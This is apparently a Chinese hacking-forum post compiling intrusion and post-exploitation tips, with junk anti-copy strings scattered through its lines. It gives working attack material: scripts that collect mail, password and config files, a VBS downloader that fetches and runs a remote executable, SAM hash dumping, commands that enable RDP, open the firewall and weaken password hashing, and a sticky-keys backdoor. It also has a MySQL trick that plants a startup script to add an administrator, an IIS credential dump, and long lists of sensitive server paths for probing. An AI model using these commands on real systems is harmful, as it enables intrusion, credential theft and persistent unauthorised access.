2 b: x# L& t, g  A  f0 m（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
3 [4 c- A: Z# A, v! u7 Y( C——————————————
" N1 _/ X) [6 j) I" F3 V- _2 o; G" v感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
& O0 c! r' w- o$ E1 ]& L" ?————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
' ^# T3 P. z1 ]5 falzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
7 e9 G# |$ v- P5 k. s{
* P( {% u, J1 B% q9 F注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
. b( t0 x: X- }, J4 O}  

提权先执行systeminfo
/ ?7 D) z1 J/ I, D. G. ntoken 漏洞补丁号 KB956572
( y; Q- Z5 ]% M% T8 S5 z- _$ FChurrasco          kb952004
3 J5 W$ S1 `1 }7 N! e命令行RAR打包~~·
# S2 r5 g: _5 x6 w: Yrar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
2、收集系统信息的脚本  
for window：

- c- n/ x6 ?  ?* g5 w# W$ j8 V0 z& `@echo off
6 a: H6 g/ c  @/ U6 O$ ?echo #########system info collection
. Y$ r/ b. F  Z1 ^8 nsysteminfo
& y  L5 t7 ~1 P' t% b! M8 kver
* y5 ^- p! ?) l7 E4 l. Jhostname
/ ?" ?6 g& y) p9 I4 Wnet user
net localgroup
net localgroup administrators
net user guest
: ~3 H6 [8 \! p! ~3 N8 [net user administrator

echo #######at- with   atq#####
$ k- O: U/ d5 c" f; \0 m% Kecho schtask /query

echo
echo ####task-list#############
% u6 r5 \9 {* r% T4 s1 Gtasklist /svc
echo
echo ####net-work infomation
+ E  _1 A& H" b  X) D- S6 Eipconfig/all
: }, l% j# |$ M5 r% Vroute print
  s: L% [: N6 a7 Y9 Barp -a
% _0 X  X  K) Z3 _) P) ?' G+ R4 Anetstat -anipconfig /displaydns
echo
echo #######service############
* h, D4 [0 N9 q& X' O5 Gsc query type= service state= all
% E4 j1 S- v9 @3 K. Y, k) m( Qecho #######file-##############
0 Y: A5 E3 y) I+ Acd \
tree -F
* p: o- f, n: M/ vfor linux：

#!/bin/bash
9 l! A) f$ Z: o- T- J% O; r& i/ I8 ]
7 l3 H& `! v1 C3 l9 f8 i1 E* @echo #######geting sysinfo####
$ d5 t0 w! e( _+ D4 Z( v' n& C. ~echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
' T# B1 V2 o3 _echo #######basic infomation##
+ J6 R4 E2 e# ]2 lcat /proc/meminfo
7 W; j/ G9 h& r3 w  d8 Zecho
* O( }' X1 P0 B+ H* B% bcat /proc/cpuinfo
9 D) s# {/ o: N( f: }: eecho
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
! i/ L/ t* ^# n2 ?: b; Z
  Y: |& y. ~. _: _: c# ^
echo 'u'r id is' `id`
6 p+ C2 m! |9 ~- S' W9 L$ yecho ###atq&crontab#####
atq
crontab -l
5 E" @! e5 \* M6 V' b3 h7 Kecho #####about var#####
set
5 `  l% f4 n! C. r
echo #####about network###
  n6 `% x8 K, y7 ~: `0 }5 d####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
: o7 Q& }4 j3 P8 mhostname
2 b2 Y% Q0 `. J" \9 ?ipconfig -a
arp -v
( d2 c% r1 p9 T4 X; v3 z- Uecho ########user####
cat /etc/passwd|grep -i sh

echo ######service####
1 |+ M0 c+ f: H  V# y0 k9 ichkconfig --list

0 D& }" z6 G7 D; l9 efor i in {oracle,mysql,tomcat,samba,apache,ftp}
; e4 n; i% d$ f. }9 q' `8 }cat /etc/passwd|grep -i $i
& i, O. i1 L4 {1 qdone
9 k$ w$ @6 T( Z4 ]1 W8 q- T
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>dev/null
- @" {' E+ H! n5 _; B, t3 I4 @1 U: rsleep 5
  F+ k1 U6 }2 A9 s% xlocate config >>/tmp/sysconfig 2>/dev/null
$ |$ M; j1 ]" Q# _1 d! Ysleep 5

###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
1 A2 X+ g2 ]: a——————————————
' N4 \* P# ]% R1 N! y  y3、ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
) f- x! t6 k" a注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
/ W8 |  d8 Q6 d6 R# Y' e接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦！
9 ^; t7 a- D1 Z* W1 o+ l0 }据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
9 @1 V$ V0 ?: n6 X( x" Y——————————————
4、vbs 下载者
! n3 N$ t- @, `1 P1
: W* u- N- X" k: Iecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
: H, O& `. [$ R' G: Y- gecho sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
% a7 P1 s3 C+ D: p3 h; Z8 \- _echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
. N: U9 }* I9 j2 Y1 h) recho sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
* U) I# W3 E) q6 [, C8 gecho Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
$ Q% U& F$ C- W7 `6 V
6 ?: F& F2 R, }: U0 V$ O. E2
On Error Resume Nextim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
' X* i( _) n0 s- FsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
2 p* `0 }6 g2 c% z) G0 m4 c: C
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
——————————————————
  p8 W6 T% u1 l- L4 R9 k2 ?$ r. t5、
, H6 U8 F! u+ Z- h% G' J1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
, N: G/ R/ f9 z! |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
. H% x$ F' J0 u7 L, w) d3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
0 O+ C6 _9 G( }1 ?- {* XREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
; \. {' O0 Z+ k5 f4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
; P+ \( z4 }; W' C& v' J7 hREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
% x' L/ U, G$ U% Q8 B/ u* i& k' L————————————————
. h7 S; X4 |0 B4 V6、create table a (cmd text);
& k  {, U( u2 O0 t; |$ Xinsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
5 W, j1 L6 S+ {————————————————————
) ~7 b' }, D: j- J: Q, c5 }8 Y6 E7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
3 d0 r5 w6 ~6 A# p_____
8、for /d %i in (d:\freehost\*) do @echo %i

列出d的所有目录
9 t" r% l; {9 D: Y0 T  
  for /d %i in (???) do @echo %i

3 R& G" C5 ]0 N- t2 X7 I7 c把当前路径下文件夹的名字只有1-3个字母的打出来

- h' z) }# D3 `# |: k+ A3 Y2.for /r %i in (*.exe) do @echo %i
, E+ U5 @8 K$ @( N  
( q) U+ u/ |: n+ m" d4 @以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

+ I; }/ L$ ?, L/ Sfor /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
& V! [+ Z0 d- t/ H4 P1 U
$ @6 j% z4 V; T5 S1 `3.for /f %i in (c:\1.txt) do echo %i
  
8 U1 Q. N! n0 e/ y0 R5 g  c  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中
' v# _' F) j- [" Z- L
; s1 I" ~/ p3 L! F4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
, f: p. w+ q% |
  delims=后的空格是分隔符 tokens是取第几个位置
——————————
+ G3 G, x5 k) U% D9 i+ ]! v●注册表:
1.Administrator注册表备份:
5 z2 S- I) r% B& ^! J$ Y0 Kreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
修改PortNumber.

5 _. M% i  F" I) U% d, Q7 D3.清除3389登录记录:
. b" `" y5 A5 \& K% R& m: F' ^reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
1 v- X! v1 n$ ]2 v
4.Radmin密码:
5 u' a1 y; G& _1 v: V$ t0 Preg export HKLM\SYSTEM\RAdmin c:\a.reg

/ l+ p  t! A" N9 B( _5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
+ A) P9 Z0 Z$ `
0 `5 R* \9 v" V- `4 s6.IPSec默认免除项88端口(需重启):
( m% V: E6 G2 C- D; mreg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
' b* I& ^( J% J/ ?/ [0 S+ _或者
netsh ipsec dynamic set config ipsecexempt value=0

7.停止指派策略"myipsec":
6 W' O: {; U: v/ Hnetsh ipsec static set policy name="myipsec" assign=n
2 t, g; h: Z! J+ U. s
8.系统口令恢复LM加密:
- X9 K3 I* x+ g0 C- v* B" Breg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
7 E3 ?2 b; ?7 e" E% s( s, H
9 O; [4 `. Q7 C1 W' T" ~9.另类方法抓系统密码HASH
reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
8 O4 C( E$ V: V8 p
10.shift映像劫持
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
: o) _6 P' n  H( Z# P
7 i5 C3 k5 V, B. i$ zreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
1 y3 I5 N. f9 c: G5 v) P-----------------------------------
% ^2 Z) P- P. f6 T' D2 T5 {, o星外vbs(注：测试通过，好东西）
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
9 ^7 G) Q1 N6 X, x  Q9 R2 m2 w" X- KFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
if IsNumeric(childObjectName)=true then
set IIs=objservice.GetObject("IIsWebServer",childObjectName)
if err.number<>0 then
exit for
" \; g' C7 U; t; R1 U8 n2 B. smsgbox("error!")
8 s7 t' ]" D: B, x( `wscript.quit
6 L! M! K" G1 O! @% m9 Fend if
: ]7 s2 N! a; p5 _, E+ Yserverbindings=IIS.serverBindings
. p1 g6 c" _* L% q# }5 U4 dServerComment=iis.servercomment
: j  s9 ]- c" S4 f$ m  ?set IISweb=iis.getobject("IIsWebVirtualDir","Root")
user=iisweb.AnonymousUserName
pass=iisweb.AnonymousUserPass
path=IIsWeb.path
list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
end if
Next
wscript.echo list
Set ObjService=Nothing
3 F4 l6 N3 [, N% N! cwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
WScript.Quit
复制代码
; `9 X0 b2 n0 C----------------------2011新气象，欢迎各位补充、指正、优化。----------------
3 h; R$ [  t. A  E, T* f1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
- s, j( P6 P9 W0 p2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
8 y$ ^& R& ^6 o将folder.htt文件，加入以下代码：
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
" c: n3 r" r0 @. S</OBJECT>
# T: z5 p' j% p0 o; U: L9 J复制代码
5 t0 Y! E1 ]4 ^2 L2 d& t! w然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
: k! P6 y6 f  Z( J, `! }PS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
asp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
url=request.severvariables("url")
这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
! B, _9 j2 A; e1 e* R url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马

0 d) W& k' b) u& d& @. m7 g==============================================================
LINUX常见路径：
" G) w0 I; a- n" k
% B" o) a% T: e) M/etc/passwd
/etc/shadow
; V+ {+ T  Y1 a' ?( C$ q9 Z/etc/fstab
6 ^! b2 q$ x2 S% p. \# B, ?4 Y/etc/host.conf
& f4 G- F$ s& |$ X8 ?/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
+ @. ~" ]7 w" _& N. s& I! c/var/www/conf/httpd.conf
6 b3 p( a  t: ^& ~+ c/ ?+ Y! R/var/www/htdocs/index.html
0 i. B# n: J4 ~, l7 F2 N/var/httpd/conf/php.ini
# t) l# @' o4 Z$ K0 m( \, T/var/httpd/htdocs/index.php
6 n3 L) K. k$ ^3 o+ r7 r: B! ?/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
) ~0 ]# {2 ]# R# {/var/www/index.html
+ L5 _2 H+ g, ]) F( y1 @& A/ ^" x- D+ O/var/www/index.php
" u/ y/ [! J9 h' G) f/opt/www/conf/httpd.conf
* k+ N! ?% E! ?# H: C* n: t/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
+ F/ Z2 ~, `6 c+ Y4 S/usr/local/apache/htdocs/index.php
  g( ?8 A' \4 j, m* f9 {/usr/local/apache2/htdocs/index.html
6 W  U( G. n$ C% M! X1 }/usr/local/apache2/htdocs/index.php
# ^$ Y0 a9 z; Q8 V3 \* N+ ~. j/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
4 \, I9 x7 y% u& e4 G/tmp/apache/htdocs/index.html
) P+ j" b4 `; g0 e/tmp/apache/htdocs/index.php
, O7 b9 o) i8 p/ O5 X/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
* `8 ?" d% E* n- A3 `/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
' M( ~& J: g# h1 f/www/php5/php.ini
( |( _/ j* |3 g! A/www/conf/httpd.conf
4 H' l, x) l1 U) O# T# C/ J8 u/www/htdocs/index.php
0 s7 n9 p: Z+ {* B0 v$ ^/www/htdocs/index.html
; {5 y+ b$ e+ A& u' d+ l/usr/local/httpd/conf/httpd.conf
4 i! ~6 O) s" D, B+ s/apache/apache/conf/httpd.conf
. m2 }. M! M7 u" g7 ?; |# m# m0 Y/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/ v" {* s" Y' q6 a8 g, V# x/etc/apache2/httpd.conf
" T7 r4 N% e) B; a5 Z$ G/etc/apache2/vhosts.d/00_default_vhost.conf
8 t& ^1 j9 R$ \( a/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
% E: X! O5 `9 P. h3 w/etc/mysql/my.cnf
8 c8 ?! j* o% H/ o/ _, j" P/etc/httpd/conf.d/php.conf
$ C5 r! F, G/ w3 F2 p7 f/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
$ n* l2 D6 g1 _1 t1 `; N/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/ v+ a6 t* @8 {/home/apache/conf/httpd.conf
0 [. B* J4 U; r+ ^. U/home/apache2/conf/httpd.conf
/ N  T' S8 E5 H; B  U/var/log/apache/error_log
/var/log/apache/error.log
8 O( Y2 x# k, H9 f/var/log/apache/access_log
' J+ U. r4 i2 i& A$ I' Y/var/log/apache/access.log
; r/ r: @0 W5 \7 o4 ~$ t/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/ B' ?, I% X# r0 q/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
" e6 s' Y( H, L" y- W3 d1 d/usr/local/apache/logs/error.log
4 f* @; O) k% L' g8 ~3 L/usr/local/apache/logs/access_log
6 E2 H, a. t# G2 R* Z) ]/usr/local/apache/logs/access.log
* v! h8 S( w: p/var/log/error_log
/var/log/error.log
4 {/ R6 e9 H7 E, j# d  q8 d* \/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
7 d9 ]/ e9 }" i* O* |$ Z8 o# |/bin/php.ini
; T/ n8 _9 d5 {+ x  }( J9 A8 m. t. H& H/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
! Z9 J. L2 i# l" Q/usr/lib/php.ini
9 Y, T( r5 T) r- o- |* l5 J: i/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
: F% f; S6 l. O( p4 D1 J+ U4 I3 @/usr/local/php/lib/php.ini
0 X4 e# s/ g0 K! a+ Q( S/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
( o' r$ C' X3 E* F2 ]/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
. c7 T5 A5 ?$ L2 `/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
$ m; t% K1 M! p" `# d# {: q3 F/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
+ r$ I( E4 ~; i7 K/etc/php4/apache/php.ini
( e4 {5 K8 h6 [1 a/ P- o2 ~/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
+ |( j) J6 s3 H& k! v/etc/php/php.ini
& o( ^% t/ c2 }, U/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
# Y; w5 ^& U& X6 \/usr/local/Zend/etc/php.ini
- t2 t1 E$ }3 B. D4 s1 J) I/opt/xampp/etc/php.ini
" ~! g. W# f" {) r7 j. T) U/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
$ {$ ?  o7 G/ |# u1 P+ H* a5 {/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/ a6 R+ \9 ]* }! v) C. Q* A* j/php5/php.ini
3 d! o6 Z$ z( r8 F: ^/ _) i4 @) {/php4/php.ini
/php/php.ini
/PHP/php.ini
' r* a$ H# j+ ]! }! k0 C8 u/apache/php/php.ini
7 g5 N8 I# L8 H% x: {/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
+ L9 ^9 e$ S2 _4 V/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
- I9 A: P! n% R/var/log/mysql.log
/var/log/mysqlderror.log
% L$ E* `0 F: D" q& x% a" Y/var/log/mysql/mysql.log
7 l. ~- K- h( Q4 T9 [4 H/var/log/mysql/mysql-slow.log
0 u. D  Y/ [" K9 t/var/mysql.log
8 N2 Q2 C; M2 B3 f/var/lib/mysql/my.cnf
$ n; `4 o$ r- T/usr/local/mysql/my.cnf
' ^: _* E! M- u  p/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
: o: `$ Y; W/ v4 i1 p$ z5 f/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/ F: a6 K4 P* C0 ~" j/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
! z% Z+ r5 w# O$ X+ H* J/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
7 [  g) o* s7 e$ O6 a5 J2 b* _1 F/ y/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini

( H) m- @5 H2 Y, |. b) H2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）

+ J8 v9 R. D2 C3 E3 U3 X$ cc:\windows\php.ini
c:\boot.ini
) N# N  p5 a3 B' T2 h$ y- a  `c:\1.txt
* `; |! Y) K6 Q3 I( |5 kc:\a.txt
( {" `! h+ z$ F: }
7 I* v! w, K! j& }c:\CMailServer\config.ini
, V7 t' f& R: x1 o$ @% [" ic:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
: N9 Y+ W; Z( s: b0 nC:\WinWebMail\SysInfo.ini
# U# B% _! p8 h% ~$ O  @0 eC:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
% n! o* `0 D. b1 c- }# jC:\WINDOWS\7i24iislog4.exe
+ o- u9 w7 n/ f$ j7 O8 i" JC:\WINDOWS\7i24tool.exe
0 R& e$ ^1 Z+ m/ W
c:\hzhost\databases\url.asp
3 b* z. [2 R9 O1 Q
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
2 c2 F9 ^. c( [( t$ QC:\WINDOWS\web.config
c:\web\index.html
0 }8 o; \! P4 ?c:\www\index.html
+ t! ?' |0 \7 T; ~4 tc:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
5 A4 |% x0 i, uc:\www\index.asp
/ \0 m8 e# R' N2 _c:\wwwsite\index.asp
c:\WWWROOT\index.asp
3 l: p5 d" {$ \4 d- F  `! c' kc:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
8 a  o! ]. U# @2 N2 f2 fc:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
; z* L! s; s2 j5 [: k- C+ ~  Pc:\website\default.html
c:\web\default.asp
2 r1 W# C* q7 ^: s, W0 A. _9 Qc:\www\default.asp
# ~0 i$ \6 g" f( F! Nc:\wwwsite\default.asp
c:\WWWROOT\default.asp
. U/ U4 c0 O9 u0 x2 _c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
! c2 ?5 Z2 x0 N1 pC:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
$ V! a; D. u4 P  F& b5 j& M' KC:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
/ i5 c0 w' k" d; A- E! ]C:\Program Files\winrar\rar.exe
: P7 d6 ~+ e0 H4 ^C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
" R; G* v4 p3 R( K! h5 J+ TC:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
2 e/ J, E* I6 w1 @c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
% n% k  t7 F$ T/ JC:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
( R1 @1 J- A' ~# L7 rC:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
! r, y! D" G, B( q: B, J# CC:\Documents and Settings\Administrator\桌面\a.txt
- O1 T7 [& I* W& s0 Q4 t( \- {! J9 MC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
; A$ Y1 o( A3 K  G8 |6 Q, i5 [E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
. F1 W4 Y6 h3 t, ^% e6 n! I- qC:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
0 j! N- `, D& h* T4 P4 TC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
' U' o1 o& F+ a' r3 z9 L% y6 q7 {C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
% W( n  [7 t, l+ h6 i- h- o% AC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
% f  S. @3 K# |C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
- M" Y. H# j$ n  b9 WC:\MySQL\MySQL Server 5.0\my.ini
6 U) _6 w- g* g+ ]$ X5 vC:\Program Files\MySQL\MySQL Server 5.0\my.ini
3 r  l# U* w0 S& ^$ b8 TC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
. A( N& x4 G; O. N: J  IC:\Program Files\MySQL\MySQL Server 5.0\COPYING
5 R" r3 b3 n0 E9 U4 rC:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
. Y% U4 X* c, Zc:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
0 m/ t4 Q- |8 {6 \/ o- ~& {2 F7 sC:\WINDOWS\system32\inetsrv\w3wp.exe
+ u' A% J  E9 ~7 nC:\WINDOWS\system32\inetsrv\inetinfo.exe
7 T; Y  H# w; V3 Q) RC:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
0 g2 ?. ]" f7 m5 `; {# W/ Y4 s" AC:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
, x6 [3 u2 ?+ O8 Q/ S5 w/ T% tc:\CMailServer\config.ini
. h1 y7 d8 [+ ~2 q2 Xc:\program files\CMailServer\config.ini
0 }% R: i- e& B: @# _& ac:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
; V% ^# r- s( R0 ?c:\tomcat\bin\version.sh
  C0 S# G& Y' d3 P- p2 X( `  Gc:\program files\tomcat6\bin\version.sh
$ i: C( {6 |5 V+ _& C" O& QC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
